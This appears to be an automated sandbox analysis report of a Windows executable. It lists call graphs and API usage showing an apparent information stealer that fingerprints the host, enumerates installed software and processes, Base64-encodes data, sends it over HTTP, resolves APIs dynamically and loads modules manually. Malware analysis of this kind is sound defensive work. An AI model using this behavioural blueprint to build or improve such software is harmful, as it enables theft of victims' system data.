14836->14837 14838 541b96 14837->14838 14839 54a920 3 API calls 14838->14839 14840 541ba9 14839->14840 14841 54a8a0 lstrcpy 14840->14841 14842 541bb2 14841->14842 14843 54a9b0 4 API calls 14842->14843 14844 541bdc 14843->14844 14845 54a8a0 lstrcpy 14844->14845 14846 541be5 14845->14846 14847 54a9b0 4 API calls 14846->14847 14848 541c05 14847->14848 14849 54a8a0 lstrcpy 14848->14849 14850 541c0e 14849->14850 15556 547690 GetProcessHeap RtlAllocateHeap 14850->15556 14853 54a9b0 4 API calls 14854 541c2e 14853->14854 14855 54a8a0 lstrcpy 14854->14855 14856 541c37 14855->14856 14857 54a9b0 4 API calls 14856->14857 14858 541c56 14857->14858 14859 54a8a0 lstrcpy 14858->14859 14860 541c5f 14859->14860 14861 54a9b0 4 API calls 14860->14861 14862 541c80 14861->14862 14863 54a8a0 lstrcpy 14862->14863 14864 541c89 14863->14864 15563 5477c0 GetCurrentProcess IsWow64Process 14864->15563 14867 54a9b0 4 API calls 14868 541ca9 14867->14868 14869 54a8a0 lstrcpy 14868->14869 14870 541cb2 14869->14870 14871 54a9b0 4 API calls 14870->14871 14872 541cd1 14871->14872 14873 54a8a0 lstrcpy 14872->14873 14874 541cda 14873->14874 14875 54a9b0 4 API calls 14874->14875 14876 541cfb 14875->14876 14877 54a8a0 lstrcpy 14876->14877 14878 541d04 14877->14878 14879 547850 3 API calls 14878->14879 14880 541d14 14879->14880 14881 54a9b0 4 API calls 14880->14881 14882 541d24 14881->14882 14883 54a8a0 lstrcpy 14882->14883 14884 541d2d 14883->14884 14885 54a9b0 4 API calls 14884->14885 14886 541d4c 14885->14886 14887 54a8a0 lstrcpy 14886->14887 14888 541d55 14887->14888 14889 54a9b0 4 API calls 14888->14889 14890 541d75 14889->14890 14891 54a8a0 lstrcpy 14890->14891 14892 541d7e 14891->14892 14893 5478e0 3 API calls 14892->14893 14894 541d8e 14893->14894 14895 54a9b0 4 API calls 14894->14895 14896 541d9e 14895->14896 14897 54a8a0 lstrcpy 14896->14897 14898 541da7 14897->14898 14899 54a9b0 4 API calls 14898->14899 14900 541dc6 14899->14900 14901 54a8a0 lstrcpy 14900->14901 14902 541dcf 14901->14902 14903 54a9b0 4 API calls 14902->14903 14904 541df0 14903->14904 14905 54a8a0 lstrcpy 14904->14905 14906 541df9 14905->14906 15565 547980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14906->15565 14909 54a9b0 4 API calls 14910 541e19 14909->14910 14911 54a8a0 lstrcpy 14910->14911 14912 541e22 14911->14912 14913 54a9b0 4 API calls 14912->14913 14914 541e41 14913->14914 14915 54a8a0 lstrcpy 14914->14915 14916 541e4a 14915->14916 14917 54a9b0 4 API calls 14916->14917 14918 541e6b 14917->14918 14919 54a8a0 lstrcpy 14918->14919 14920 541e74 14919->14920 15567 547a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14920->15567 14923 54a9b0 4 API calls 14924 541e94 14923->14924 14925 54a8a0 lstrcpy 14924->14925 14926 541e9d 14925->14926 14927 54a9b0 4 API calls 14926->14927 14928 541ebc 14927->14928 14929 54a8a0 lstrcpy 14928->14929 14930 541ec5 14929->14930 14931 54a9b0 4 API calls 14930->14931 14932 541ee5 14931->14932 14933 54a8a0 lstrcpy 14932->14933 14934 541eee 14933->14934 15570 547b00 GetUserDefaultLocaleName 14934->15570 14937 54a9b0 4 API calls 14938 541f0e 14937->14938 14939 54a8a0 lstrcpy 14938->14939 14940 541f17 14939->14940 14941 54a9b0 4 API calls 14940->14941 14942 541f36 14941->14942 14943 54a8a0 lstrcpy 14942->14943 14944 541f3f 14943->14944 14945 54a9b0 4 API calls 14944->14945 14946 541f60 14945->14946 14947 54a8a0 lstrcpy 14946->14947 14948 541f69 14947->14948 15574 547b90 14948->15574 14950 541f80 14951 54a920 3 API calls 14950->14951 14952 541f93 14951->14952 14953 54a8a0 lstrcpy 14952->14953 14954 541f9c 14953->14954 14955 54a9b0 4 API calls 14954->14955 14956 541fc6 14955->14956 14957 54a8a0 lstrcpy 14956->14957 14958 541fcf 14957->14958 14959 54a9b0 4 API calls 14958->14959 14960 541fef 14959->14960 14961 54a8a0 lstrcpy 14960->14961 14962 541ff8 14961->14962 15586 547d80 GetSystemPowerStatus 14962->15586 14965 54a9b0 4 API calls 14966 542018 14965->14966 14967 54a8a0 lstrcpy 14966->14967 14968 542021 14967->14968 14969 54a9b0 4 API calls 14968->14969 14970 542040 14969->14970 14971 54a8a0 lstrcpy 14970->14971 14972 542049 14971->14972 14973 54a9b0 4 API calls 14972->14973 14974 54206a 14973->14974 14975 54a8a0 lstrcpy 14974->14975 14976 542073 14975->14976 14977 54207e GetCurrentProcessId 14976->14977 15588 549470 OpenProcess 14977->15588 14980 54a920 3 API calls 14981 5420a4 14980->14981 14982 54a8a0 lstrcpy 14981->14982 14983 5420ad 14982->14983 14984 54a9b0 4 API calls 14983->14984 14985 5420d7 14984->14985 14986 54a8a0 lstrcpy 14985->14986 14987 5420e0 14986->14987 14988 54a9b0 4 API calls 14987->14988 14989 542100 14988->14989 14990 54a8a0 lstrcpy 14989->14990 14991 542109 14990->14991 15593 547e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14991->15593 14994 54a9b0 4 API calls 14995 542129 14994->14995 14996 54a8a0 lstrcpy 14995->14996 14997 542132 14996->14997 14998 54a9b0 4 API calls 14997->14998 14999 542151 14998->14999 15000 54a8a0 lstrcpy 14999->15000 15001 54215a 15000->15001 15002 54a9b0 4 API calls 15001->15002 15003 54217b 15002->15003 15004 54a8a0 lstrcpy 15003->15004 15005 542184 15004->15005 15597 547f60 15005->15597 15008 54a9b0 4 API calls 15009 5421a4 15008->15009 15010 54a8a0 lstrcpy 15009->15010 15011 5421ad 15010->15011 15012 54a9b0 4 API calls 15011->15012 15013 5421cc 15012->15013 15014 54a8a0 lstrcpy 15013->15014 15015 5421d5 15014->15015 15016 54a9b0 4 API calls 15015->15016 15017 5421f6 15016->15017 15018 54a8a0 lstrcpy 15017->15018 15019 5421ff 15018->15019 15610 547ed0 GetSystemInfo wsprintfA 15019->15610 15022 54a9b0 4 API calls 15023 54221f 15022->15023 15024 54a8a0 lstrcpy 15023->15024 15025 542228 15024->15025 15026 54a9b0 4 API calls 15025->15026 15027 542247 15026->15027 15028 54a8a0 lstrcpy 15027->15028 15029 542250 15028->15029 15030 54a9b0 4 API calls 15029->15030 15031 542270 15030->15031 15032 54a8a0 lstrcpy 15031->15032 15033 542279 15032->15033 15612 548100 GetProcessHeap RtlAllocateHeap 15033->15612 15036 54a9b0 4 API calls 15037 542299 15036->15037 15038 54a8a0 lstrcpy 15037->15038 15039 5422a2 15038->15039 15040 54a9b0 4 API calls 15039->15040 15041 5422c1 15040->15041 15042 54a8a0 lstrcpy 15041->15042 15043 5422ca 15042->15043 15044 54a9b0 4 API calls 15043->15044 15045 5422eb 15044->15045 15046 54a8a0 lstrcpy 15045->15046 15047 5422f4 15046->15047 15618 5487c0 15047->15618 15050 54a920 3 API calls 15051 54231e 15050->15051 15052 54a8a0 lstrcpy 15051->15052 15053 542327 15052->15053 15054 54a9b0 4 API calls 15053->15054 15055 542351 15054->15055 15056 54a8a0 lstrcpy 15055->15056 15057 54235a 15056->15057 15058 54a9b0 4 API calls 15057->15058 15059 54237a 15058->15059 15060 54a8a0 lstrcpy 15059->15060 15061 542383 15060->15061 15062 54a9b0 4 API calls 15061->15062 15063 5423a2 15062->15063 15064 54a8a0 lstrcpy 15063->15064 15065 5423ab 15064->15065 15623 5481f0 15065->15623 15067 5423c2 15068 54a920 3 API calls 15067->15068 15069 5423d5 15068->15069 15070 54a8a0 lstrcpy 15069->15070 15071 5423de 15070->15071 15072 54a9b0 4 API calls 15071->15072 15073 54240a 15072->15073 15074 54a8a0 lstrcpy 15073->15074 15075 542413 15074->15075 15076 54a9b0 4 API calls 15075->15076 15077 542432 15076->15077 15078 54a8a0 lstrcpy 15077->15078 15079 54243b 15078->15079 15080 54a9b0 4 API calls 15079->15080 15081 54245c 15080->15081 15082 54a8a0 lstrcpy 15081->15082 15083 542465 15082->15083 15084 54a9b0 4 API calls 15083->15084 15085 542484 15084->15085 15086 54a8a0 lstrcpy 15085->15086 15087 54248d 15086->15087 15088 54a9b0 4 API calls 15087->15088 15089 5424ae 15088->15089 15090 54a8a0 lstrcpy 15089->15090 15091 5424b7 15090->15091 15631 548320 15091->15631 15093 5424d3 15094 54a920 3 API calls 15093->15094 15095 5424e6 15094->15095 15096 54a8a0 lstrcpy 15095->15096 15097 5424ef 15096->15097 15098 54a9b0 4 API calls 15097->15098 15099 542519 15098->15099 15100 54a8a0 lstrcpy 15099->15100 15101 542522 15100->15101 15102 54a9b0 4 API calls 15101->15102 15103 542543 15102->15103 15104 54a8a0 lstrcpy 15103->15104 15105 54254c 15104->15105 15106 548320 17 API calls 15105->15106 15107 542568 15106->15107 15108 54a920 3 API calls 15107->15108 15109 54257b 15108->15109 15110 54a8a0 lstrcpy 15109->15110 15111 542584 15110->15111 15112 54a9b0 4 API calls 15111->15112 15113 5425ae 15112->15113 15114 54a8a0 lstrcpy 15113->15114 15115 5425b7 15114->15115 15116 54a9b0 4 API calls 15115->15116 15117 5425d6 15116->15117 15118 54a8a0 lstrcpy 15117->15118 15119 5425df 15118->15119 15120 54a9b0 4 API calls 15119->15120 15121 542600 15120->15121 15122 54a8a0 lstrcpy 15121->15122 15123 542609 15122->15123 15667 548680 15123->15667 15125 542620 15126 54a920 3 API calls 15125->15126 15127 542633 15126->15127 15128 54a8a0 lstrcpy 15127->15128 15129 54263c 15128->15129 15130 54265a lstrlen 15129->15130 15131 54266a 15130->15131 15132 54a740 lstrcpy 15131->15132 15133 54267c 15132->15133 15134 531590 lstrcpy 15133->15134 15135 54268d 15134->15135 15677 545190 15135->15677 15137 542699 15137->13569 15865 54aad0 15138->15865 15140 535009 InternetOpenUrlA 15143 535021 15140->15143 15141 5350a0 InternetCloseHandle InternetCloseHandle 15144 5350ec 15141->15144 15142 53502a InternetReadFile 15142->15143 15143->15141 15143->15142 15144->13573 15866 5398d0 15145->15866 15147 540759 15148 54077d 15147->15148 15149 540a38 15147->15149 15151 540799 StrCmpCA 15148->15151 15150 531590 lstrcpy 15149->15150 15152 540a49 15150->15152 15154 5407a8 15151->15154 15155 540843 15151->15155 16042 540250 15152->16042 15157 54a7a0 lstrcpy 15154->15157 15158 540865 StrCmpCA 15155->15158 15159 5407c3 15157->15159 15160 540874 15158->15160 15197 54096b 15158->15197 15161 531590 lstrcpy 15159->15161 15162 54a740 lstrcpy 15160->15162 15163 54080c 15161->15163 15165 540881 15162->15165 15166 54a7a0 lstrcpy 15163->15166 15164 54099c StrCmpCA 15167 540a2d 15164->15167 15168 5409ab 15164->15168 15169 54a9b0 4 API calls 15165->15169 15170 540823 15166->15170 15167->13577 15171 531590 lstrcpy 15168->15171 15172 5408ac 15169->15172 15173 54a7a0 lstrcpy 15170->15173 15174 5409f4 15171->15174 15175 54a920 3 API calls 15172->15175 15176 54083e 15173->15176 15177 54a7a0 lstrcpy 15174->15177 15178 5408b3 15175->15178 15869 53fb00 15176->15869 15180 540a0d 15177->15180 15181 54a9b0 4 API calls 15178->15181 15182 54a7a0 lstrcpy 15180->15182 15183 5408ba 15181->15183 15184 540a28 15182->15184 15185 54a8a0 lstrcpy 15183->15185 15985 540030 15184->15985 15197->15164 15517 54a7a0 lstrcpy 15516->15517 15518 531683 15517->15518 15519 54a7a0 lstrcpy 15518->15519 15520 531695 15519->15520 15521 54a7a0 lstrcpy 15520->15521 15522 5316a7 15521->15522 15523 54a7a0 lstrcpy 15522->15523 15524 5315a3 15523->15524 15524->14400 15526 5347c6 15525->15526 15527 534838 lstrlen 15526->15527 15551 54aad0 15527->15551 15529 534848 InternetCrackUrlA 15530 534867 15529->15530 15530->14477 15532 54a740 lstrcpy 15531->15532 15533 548b74 15532->15533 15534 54a740 lstrcpy 15533->15534 15535 548b82 GetSystemTime 15534->15535 15537 548b99 15535->15537 15536 54a7a0 lstrcpy 15538 548bfc 15536->15538 15537->15536 15538->14492 15540 54a931 15539->15540 15541 54a988 15540->15541 15543 54a968 lstrcpy lstrcat 15540->15543 15542 54a7a0 lstrcpy 15541->15542 15544 54a994 15542->15544 15543->15541 15544->14495 15545->14610 15547 534eee 15546->15547 15548 539af9 LocalAlloc 15546->15548 15547->14498 15547->14500 15548->15547 15549 539b14 CryptStringToBinaryA 15548->15549 15549->15547 15550 539b39 LocalFree 15549->15550 15550->15547 15551->15529 15552->14620 15553->14761 15554->14763 15555->14771 15684 5477a0 15556->15684 15559 5476c6 RegOpenKeyExA 15561 547704 RegCloseKey 15559->15561 15562 5476e7 RegQueryValueExA 15559->15562 15560 541c1e 15560->14853 15561->15560 15562->15561 15564 541c99 15563->15564 15564->14867 15566 541e09 15565->15566 15566->14909 15568 541e84 15567->15568 15569 547a9a wsprintfA 15567->15569 15568->14923 15569->15568 15571 547b4d 15570->15571 15573 541efe 15570->15573 15691 548d20 LocalAlloc CharToOemW 15571->15691 15573->14937 15575 54a740 lstrcpy 15574->15575 15576 547bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15575->15576 15585 547c25 15576->15585 15577 547c46 GetLocaleInfoA 15577->15585 15578 547d18 15579 547d1e LocalFree 15578->15579 15580 547d28 15578->15580 15579->15580 15581 54a7a0 lstrcpy 15580->15581 15584 547d37 15581->15584 15582 54a8a0 lstrcpy 15582->15585 15583 54a9b0 lstrcpy lstrlen lstrcpy lstrcat 15583->15585 15584->14950 15585->15577 15585->15578 15585->15582 15585->15583 15587 542008 15586->15587 15587->14965 15589 5494b5 15588->15589 15590 549493 GetModuleFileNameExA CloseHandle 15588->15590 15591 54a740 lstrcpy 15589->15591 15590->15589 15592 542091 15591->15592 15592->14980 15594 542119 15593->15594 15595 547e68 RegQueryValueExA 15593->15595 15594->14994 15596 547e8e RegCloseKey 15595->15596 15596->15594 15598 547fb9 GetLogicalProcessorInformationEx 15597->15598 15599 547fd8 GetLastError 15598->15599 15602 548029 15598->15602 15600 548022 15599->15600 15609 547fe3 15599->15609 15601 542194 15600->15601 15605 5489f0 2 API calls 15600->15605 15601->15008 15606 5489f0 2 API calls 15602->15606 15605->15601 15607 54807b 15606->15607 15607->15600 15608 548084 wsprintfA 15607->15608 15608->15601 15609->15598 15609->15601 15692 5489f0 15609->15692 15695 548a10 GetProcessHeap RtlAllocateHeap 15609->15695 15611 54220f 15610->15611 15611->15022 15613 5489b0 15612->15613 15614 54814d GlobalMemoryStatusEx 15613->15614 15617 548163 15614->15617 15615 54819b wsprintfA 15616 542289 15615->15616 15616->15036 15617->15615 15619 5487fb GetProcessHeap RtlAllocateHeap wsprintfA 15618->15619 15621 54a740 lstrcpy 15619->15621 15622 54230b 15621->15622 15622->15050 15624 54a740 lstrcpy 15623->15624 15625 548229 15624->15625 15626 548263 15625->15626 15628 54a9b0 lstrcpy lstrlen lstrcpy lstrcat 15625->15628 15630 54a8a0 lstrcpy 15625->15630 15627 54a7a0 lstrcpy 15626->15627 15629 5482dc 15627->15629 15628->15625 15629->15067 15630->15625 15632 54a740 lstrcpy 15631->15632 15633 54835c RegOpenKeyExA 15632->15633 15634 5483d0 15633->15634 15635 5483ae 15633->15635 15637 548613 RegCloseKey 15634->15637 15638 5483f8 RegEnumKeyExA 15634->15638 15636 54a7a0 lstrcpy 15635->15636 15648 5483bd 15636->15648 15639 54a7a0 lstrcpy 15637->15639 15640 54860e 15638->15640 15641 54843f wsprintfA RegOpenKeyExA 15638->15641 15639->15648 15640->15637 15642 548485 RegCloseKey RegCloseKey 15641->15642 15643 5484c1 RegQueryValueExA 15641->15643 15646 54a7a0 lstrcpy 15642->15646 15644 548601 RegCloseKey 15643->15644 15645 5484fa lstrlen 15643->15645 15644->15640 15645->15644 15647 548510 15645->15647 15646->15648 15649 54a9b0 4 API calls 15647->15649 15648->15093 15650 548527 15649->15650 15651 54a8a0 lstrcpy 15650->15651 15652 548533 15651->15652 15653 54a9b0 4 API calls 15652->15653 15654 548557 15653->15654 15655 54a8a0 lstrcpy 15654->15655 15656 548563 15655->15656 15657 54856e RegQueryValueExA 15656->15657 15657->15644 15658 5485a3 15657->15658 15659 54a9b0 4 API calls 15658->15659 15660 5485ba 15659->15660 15661 54a8a0 lstrcpy 15660->15661 15662 5485c6 15661->15662 15663 54a9b0 4 API calls 15662->15663 15664 5485ea 15663->15664 15665 54a8a0 lstrcpy 15664->15665 15666 5485f6 15665->15666 15666->15644 15668 54a740 lstrcpy 15667->15668 15669 5486bc CreateToolhelp32Snapshot Process32First 15668->15669 15670 54875d CloseHandle 15669->15670 15671 5486e8 Process32Next 15669->15671 15672 54a7a0 lstrcpy 15670->15672 15671->15670 15676 5486fd 15671->15676 15673 548776 15672->15673 15673->15125 15674 54a9b0 lstrcpy lstrlen lstrcpy lstrcat 15674->15676 15675 54a8a0 lstrcpy 15675->15676 15676->15671 15676->15674 15676->15675 15678 54a7a0 lstrcpy 15677->15678 15679 5451b5 15678->15679 15680 531590 lstrcpy 15679->15680 15681 5451c6 15680->15681 15696 535100 15681->15696 15683 5451cf 15683->15137 15687 547720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15684->15687 15686 5476b9 15686->15559 15686->15560 15688 547765 RegQueryValueExA 15687->15688 15689 547780 RegCloseKey 15687->15689 15688->15689 15690 547793 15689->15690 15690->15686 15691->15573 15693 548a0c 15692->15693 15694 5489f9 GetProcessHeap HeapFree 15692->15694 15693->15609 15694->15693 15695->15609 15697 54a7a0 lstrcpy 15696->15697 15698 535119 15697->15698 15699 5347b0 2 API calls 15698->15699 15700 535125 15699->15700 15856 548ea0 15700->15856 15702 535184 15703 535192 lstrlen 15702->15703 15704 5351a5 15703->15704 15705 548ea0 4 API calls 15704->15705 15706 5351b6 15705->15706 15707 54a740 lstrcpy 15706->15707 15708 5351c9 15707->15708 15709 54a740 lstrcpy 15708->15709 15710 5351d6 15709->15710 15711 54a740 lstrcpy 15710->15711 15712 5351e3 15711->15712 15713 54a740 lstrcpy 15712->15713 15714 5351f0 15713->15714 15715 54a740 lstrcpy 15714->15715 15716 5351fd InternetOpenA StrCmpCA 15715->15716 15717 53522f 15716->15717 15718 5358c4 InternetCloseHandle 15717->15718 15719 548b60 3 API calls 15717->15719 15725 5358d9 codecvt 15718->15725 15720 53524e 15719->15720 15721 54a920 3 API calls 15720->15721 15722 535261 15721->15722 15723 54a8a0 lstrcpy 15722->15723 15724 53526a 15723->15724 15726 54a9b0 4 API calls 15724->15726 15729 54a7a0 lstrcpy 15725->15729 15727 5352ab 15726->15727 15728 54a920 3 API calls 15727->15728 15730 5352b2 15728->15730 15737 535913 15729->15737 15731 54a9b0 4 API calls 15730->15731 15732 5352b9 15731->15732 15733 54a8a0 lstrcpy 15732->15733 15734 5352c2 15733->15734 15735 54a9b0 4 API calls 15734->15735 15736 535303 15735->15736 15738 54a920 3 API calls 15736->15738 15737->15683 15739 53530a 15738->15739 15740 54a8a0 lstrcpy 15739->15740 15741 535313 15740->15741 15742 535329 InternetConnectA 15741->15742 15742->15718 15743 535359 HttpOpenRequestA 15742->15743 15745 5358b7 InternetCloseHandle 15743->15745 15746 5353b7 15743->15746 15745->15718 15747 54a9b0 4 API calls 15746->15747 15748 5353cb 15747->15748 15749 54a8a0 lstrcpy 15748->15749 15750 5353d4 15749->15750 15751 54a920 3 API calls 15750->15751 15752 5353f2 15751->15752 15753 54a8a0 lstrcpy 15752->15753 15754 5353fb 15753->15754 15755 54a9b0 4 API calls 15754->15755 15756 53541a 15755->15756 15757 54a8a0 lstrcpy 15756->15757 15758 535423 15757->15758 15759 54a9b0 4 API calls 15758->15759 15760 535444 15759->15760 15761 54a8a0 lstrcpy 15760->15761 15762 53544d 15761->15762 15763 54a9b0 4 API calls 15762->15763 15764 53546e 15763->15764 15765 54a8a0 lstrcpy 15764->15765 15857 548ead CryptBinaryToStringA 15856->15857 15861 548ea9 15856->15861 15858 548ece GetProcessHeap RtlAllocateHeap 15857->15858 15857->15861 15859 548ef4 codecvt 15858->15859 15858->15861 15860 548f05 CryptBinaryToStringA 15859->15860 15860->15861 15861->15702 15865->15140 16108 539880 15866->16108 15868 5398e1 15868->15147 15870 54a740 lstrcpy 15869->15870 15871 53fb16 15870->15871 15986 54a740 lstrcpy 15985->15986 16043 54a740 lstrcpy 16042->16043 16044 540266 16043->16044 16045 548de0 2 API calls 16044->16045 16046 54027b 16045->16046 16047 54a920 3 API calls 16046->16047 16048 54028b 16047->16048 16049 54a8a0 lstrcpy 16048->16049 16050 540294 16049->16050 16051 54a9b0 4 API calls 16050->16051 16052 5402b8 16051->16052 16109 53988d 16108->16109 16112 536fb0 16109->16112 16111 5398ad codecvt 16111->15868 16115 536d40 16112->16115 16116 536d63 16115->16116 16123 536d59 16115->16123 16116->16123 16129 536660 16116->16129 16118 536dbe 16118->16123 16135 5369b0 16118->16135 16120 536e2a 16121 536ee6 VirtualFree 16120->16121 16122 536ef7 16120->16122 16120->16123 16121->16122 16124 536f41 16122->16124 16126 536f26 FreeLibrary 16122->16126 16127 536f38 16122->16127 16123->16111 16124->16123 16125 5489f0 2 API calls 16124->16125 16125->16123 16126->16122 16128 5489f0 2 API calls 16127->16128 16128->16124 16133 53668f VirtualAlloc 16129->16133 16131 536730 16132 53673c 16131->16132 16134 536743 VirtualAlloc 16131->16134 16132->16118 16133->16131 16133->16132 16134->16132 16136 5369c9 16135->16136 16140 5369d5 16135->16140 16137 536a09 LoadLibraryA 16136->16137 16136->16140 16138 536a32 16137->16138 16137->16140 16142 536ae0 16138->16142 16145 548a10 GetProcessHeap RtlAllocateHeap 16138->16145 16140->16120 16141 536ba8 GetProcAddress 16141->16140 16141->16142 16142->16140 16142->16141 16143 5489f0 2 API calls 16143->16142 16144 536a8b 16144->16140 16144->16143 16145->16144

                                  Executed Functions

                                  Function 00549860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 549860-549874 call 549750 663 549a93-549af2 LoadLibraryA * 5 660->663 664 54987a-549a8e call 549780 GetProcAddress * 21 660->664 666 549af4-549b08 GetProcAddress 663->666 667 549b0d-549b14 663->667 664->663 666->667 669 549b46-549b4d 667->669 670 549b16-549b41 GetProcAddress * 2 667->670 671 549b4f-549b63 GetProcAddress 669->671 672 549b68-549b6f 669->672 670->669 671->672 673 549b71-549b84 GetProcAddress 672->673 674 549b89-549b90 672->674 673->674 675 549bc1-549bc2 674->675 676 549b92-549bbc GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(74DD0000,011F2398), ref: 005498A1
                                  • GetProcAddress.KERNEL32(74DD0000,011F2338), ref: 005498BA
                                  • GetProcAddress.KERNEL32(74DD0000,011F2248), ref: 005498D2
                                  • GetProcAddress.KERNEL32(74DD0000,011F23C8), ref: 005498EA
                                  • GetProcAddress.KERNEL32(74DD0000,011F2458), ref: 00549903
                                  • GetProcAddress.KERNEL32(74DD0000,011F91E8), ref: 0054991B
                                  • GetProcAddress.KERNEL32(74DD0000,011E5C30), ref: 00549933
                                  • GetProcAddress.KERNEL32(74DD0000,011E5AD0), ref: 0054994C
                                  • GetProcAddress.KERNEL32(74DD0000,011F2470), ref: 00549964
                                  • GetProcAddress.KERNEL32(74DD0000,011F2488), ref: 0054997C
                                  • GetProcAddress.KERNEL32(74DD0000,011F22A8), ref: 00549995
                                  • GetProcAddress.KERNEL32(74DD0000,011F2260), ref: 005499AD
                                  • GetProcAddress.KERNEL32(74DD0000,011E5D10), ref: 005499C5
                                  • GetProcAddress.KERNEL32(74DD0000,011F2278), ref: 005499DE
                                  • GetProcAddress.KERNEL32(74DD0000,011F22C0), ref: 005499F6
                                  • GetProcAddress.KERNEL32(74DD0000,011E5B50), ref: 00549A0E
                                  • GetProcAddress.KERNEL32(74DD0000,011F2350), ref: 00549A27
                                  • GetProcAddress.KERNEL32(74DD0000,011F22D8), ref: 00549A3F
                                  • GetProcAddress.KERNEL32(74DD0000,011E5BB0), ref: 00549A57
                                  • GetProcAddress.KERNEL32(74DD0000,011F2368), ref: 00549A70
                                  • GetProcAddress.KERNEL32(74DD0000,011E5BD0), ref: 00549A88
                                  • LoadLibraryA.KERNEL32(011F25D8,?,00546A00), ref: 00549A9A
                                  • LoadLibraryA.KERNEL32(011F2560,?,00546A00), ref: 00549AAB
                                  • LoadLibraryA.KERNEL32(011F2530,?,00546A00), ref: 00549ABD
                                  • LoadLibraryA.KERNEL32(011F25A8,?,00546A00), ref: 00549ACF
                                  • LoadLibraryA.KERNEL32(011F2578,?,00546A00), ref: 00549AE0
                                  • GetProcAddress.KERNEL32(75A70000,011F2518), ref: 00549B02
                                  • GetProcAddress.KERNEL32(75290000,011F25C0), ref: 00549B23
                                  • GetProcAddress.KERNEL32(75290000,011F2590), ref: 00549B3B
                                  • GetProcAddress.KERNEL32(75BD0000,011F2548), ref: 00549B5D
                                  • GetProcAddress.KERNEL32(75450000,011E5BF0), ref: 00549B7E
                                  • GetProcAddress.KERNEL32(76E90000,011F92C8), ref: 00549B9F
                                  • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00549BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00549BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                  • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: aee99fc8a07a6783d27c1a9564423215e0987c09bc0d06f1c0caf470285277b7
                                  • Instruction ID: d797cf05844b653ae60a850a9e294924309070703860a8b8d046506365506ced
                                  • Opcode Fuzzy Hash: aee99fc8a07a6783d27c1a9564423215e0987c09bc0d06f1c0caf470285277b7
                                  • Instruction Fuzzy Hash: 77A159B5504240BFF349EFA8ED8995A3BF9F7D8281704C51AA60D83264D63D98C1CB9B
                                  Function 005345C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 5345c0-534695 RtlAllocateHeap 781 5346a0-5346a6 764->781 782 53474f-5347a9 VirtualProtect 781->782 783 5346ac-53474a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0053460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0053479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0053473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005346D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005345C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 005346B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00534638
